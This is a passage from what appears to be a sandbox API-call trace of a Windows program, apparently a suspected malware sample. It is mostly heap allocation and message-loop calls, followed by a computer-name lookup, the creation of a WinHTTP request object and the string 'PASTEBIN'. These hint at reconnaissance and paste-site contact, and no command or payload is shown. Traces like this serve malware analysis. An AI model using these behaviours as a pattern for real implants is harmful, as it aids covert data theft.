hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.634] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.634] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.634] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.634] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.634] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.634] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.635] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.635] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.635] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.635] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.635] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.635] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.635] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.635] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbfd5e0 | out: hHeap=0xb80000) returned 1 [0266.635] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.635] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.635] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.635] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99b80 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.635] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99b80 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbb0d8 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99da8 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a618 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1988 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe280 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a630 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d00 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b68 | out: hHeap=0xb80000) returned 1 [0266.635] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe258 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99be0 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d60 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18f8 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe230 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99b50 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc8a520 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b18 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a5e8 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a5d0 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a5b8 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b28 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a5a0 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a588 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a570 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b38 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a558 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a540 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a528 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b48 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a510 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a4f8 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a4e0 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b08 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a4c8 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a4b0 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a498 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1af8 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a480 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a468 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a450 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ae8 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a438 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a420 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a408 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ad8 | out: hHeap=0xb80000) returned 1 [0266.636] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3d8 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3c0 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ac8 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3a8 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a390 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a378 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ab8 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a360 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a330 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1aa8 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a318 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a300 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2e8 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a98 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2d0 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2b8 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2a0 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a88 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a288 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a258 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a78 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a240 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a228 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a210 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a68 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a1f8 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a1e0 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a1c8 | out: hHeap=0xb80000) returned 1 [0266.637] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a58 | out: hHeap=0xb80000) returned 1 [0266.951] GetComputerNameW (in: lpBuffer=0x75f008, nSize=0x75f324 | out: lpBuffer="XDUWTFONO", nSize=0x75f324) returned 1 [0266.951] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a708 [0266.951] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe050 [0266.951] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b78 [0266.952] CoInitialize (pvReserved=0x0) returned 0x1 [0266.952] CoUninitialize () [0266.952] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x3c) returned 0xbbb120 [0266.952] CLSIDFromProgID (in: lpszProgID="winhttp.winhttprequest.5.1", lpclsid=0xbbb138 | out: lpclsid=0xbbb138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0 [0266.957] CoCreateInstance (in: rclsid=0xbbb138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x5, riid=0xbbb148*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x75f2d0 | out: ppv=0x75f2d0*=0xbc3298) returned 0x0 [0266.967] WinHttpRequest:IUnknown:QueryInterface (in: This=0xbc3298, riid=0x322c9c*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x75f2a0 | out: ppvObject=0x75f2a0*=0x0) returned 0x80004002 [0266.967] WinHttpRequest:IUnknown:QueryInterface (in: This=0xbc3298, riid=0x322c4c*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x75f2a0 | out: ppvObject=0x75f2a0*=0x0) returned 0x80004002 [0266.968] WinHttpRequest:IUnknown:QueryInterface (in: This=0xbc3298, riid=0x322c0c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xbbb128 | out: ppvObject=0xbbb128*=0xbc3298) returned 0x0 [0266.968] WinHttpRequest:IUnknown:Release (This=0xbc3298) returned 0x1 [0266.968] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a510 [0266.968] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a498 [0266.968] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a498 | out: hHeap=0xb80000) returned 1 [0266.968] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99af0 | out: hHeap=0xb80000) returned 1 [0266.968] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a618 | out: hHeap=0xb80000) returned 1 [0266.968] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe1e0 | out: hHeap=0xb80000) returned 1 [0266.968] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b78 | out: hHeap=0xb80000) returned 1 [0266.968] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe1e0 [0266.968] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a618 [0266.968] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b78 [0266.968] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99af0 [0266.968] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a498 [0266.968] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a510 | out: hHeap=0xb80000) returned 1 [0266.968] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0266.968] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc18d8 [0266.968] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a510 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b38 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a4b0 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b18 [0266.969] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe488 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a4c8 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a450 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a468 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a480 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a408 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a420 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a438 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a3c0 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a3d8 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a3f0 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b48 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a378 [0266.969] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b48 | out: hHeap=0xb80000) returned 1 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe4b0 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a390 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3a8 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b48 [0266.969] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a378 | out: hHeap=0xb80000) returned 1 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b28 [0266.969] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe4d8 [0266.970] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe4d8 | out: hHeap=0xb80000) returned 1 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b28 | out: hHeap=0xb80000) returned 1 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a378 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xbbb318 [0266.970] PeekMessageW (in: lpMsg=0x75ede4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75ede4) returned 0 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe4d8 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a330 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b28 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a348 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b28 | out: hHeap=0xb80000) returned 1 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a360 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a330 | out: hHeap=0xb80000) returned 1 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe4d8 | out: hHeap=0xb80000) returned 1 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xb933f0 | out: hHeap=0xb80000) returned 1 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba50e0 | out: hHeap=0xb80000) returned 1 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a360 | out: hHeap=0xb80000) returned 1 [0266.970] PeekMessageW (in: lpMsg=0x75ede4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75ede4) returned 0 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xba50e0 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a360 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba50e0 | out: hHeap=0xb80000) returned 1 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe4d8 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a330 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba50e0 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a348 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2e8 [0266.970] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a360 | out: hHeap=0xb80000) returned 1 [0266.970] PeekMessageW (in: lpMsg=0x75ede4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75ede4) returned 0 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b28 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe500 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a360 [0266.970] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b08 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe528 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a300 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1af8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a318 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1ae8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xbed3d8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2a0 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1ad8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x50) returned 0xc03938 [0266.971] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2a0 | out: hHeap=0xb80000) returned 1 [0266.971] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbed3d8 | out: hHeap=0xb80000) returned 1 [0266.971] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ae8 | out: hHeap=0xb80000) returned 1 [0266.971] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1af8 | out: hHeap=0xb80000) returned 1 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x50) returned 0xc039e8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1af8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 